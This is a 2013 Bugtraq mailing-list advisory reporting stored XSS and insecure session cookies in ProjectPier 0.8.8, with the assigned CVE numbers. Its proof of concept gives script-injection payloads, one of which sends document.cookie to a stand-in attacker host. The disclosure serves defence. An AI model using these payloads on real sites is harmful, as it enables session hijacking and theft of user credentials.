[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CANB-X368Q7neLGFp0VwEME6x0yi+4cGEWnpf2b2uM9W8AHVeEw@mail.gmail.com>
Date: Tue, 9 Jul 2013 19:42:18 -0700
From: the infinitenigma <theinfinitenigma@...il.com>
To: bugtraq@...urityfocus.com
Cc: cve-assign@...re.org, reinier.van.loon@...il.com
Subject: Re: Project Pier Web Vulnerabilities
Mitre has assigned the following CVE's for these issues in Project Pier:
XSS: CVE-2013-3635
Session cookies lack HttpOnly flag: CVE-2013-3636
Session cookies lack Secure flag: CVE-2013-3637
On Tue, May 21, 2013 at 9:26 PM, the infinitenigma
<theinfinitenigma@...il.com> wrote:
> Summary
> --------------------
> Software : ProjectPier
> Version : 0.8.8 (other versions untested)
> Website : http://www.projectpier.org
> Issue : XSS (stored), Insecure Cookie storage
> CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N)
> CVSS Score: 7.9
> Researcher: Carl Benedict
>
> Product Description
> --------------------
> ProjectPier is a Free, Open-Source, PHP web application for managing
> tasks, projects and teams through an intuitive web interface.
>
> Details
> --------------------
> The ProjectPier web application is affected by stored XSS and insecure
> cookie storage. The combination of these two vulnerabilities can lead
> to full compromise of application credentials by stealing session
> cookies.
>
> The stored XSS can be found in the Contact Name, Contact Company Name,
> Contact Description fields.
>
> Proof of Concept
> --------------------
>
> Enter any of the following strings into the Contact Name, Contact
> Company Name, and Company Description fields will generate a
> JavaScript alert dialog when viewing Contacts:
>
> <script>alert(1)</script>
>
> %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
>
> Cookie insecurity:
>
> The session cookies are not protected by the HttpOnly or Secure flags,
> allowing them to be accessed via JavaScript and sent over HTTP.
>
> Basic JavaScript alert, returning cookie values:
>
> <script>alert(document.cookie)</script>
>
> JavaScript that sends all cookie values to 'http://evilsite' for
> logging and reuse on the attacker side:
>
> <script>var url1 = "<img src=http://evilsite/" +
> encodeURIComponent(document.cookie) + ">"; document.writeln(url1);
> </script>
>
> History
> --------------------
> 11/07/2012 : Initial contact
> 11/07/2012 : Vendor response. Fix planned
> 11/12/2012 : Update requested
> 05/21/2013 : No updates. Advisory released
>
> References
> --------------------
> Bug Report : http://www.projectpier.org/node/4520
> Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg
> Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg
> Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg
>
>
> --
> ∞
--
∞
Powered by blists - more mailing lists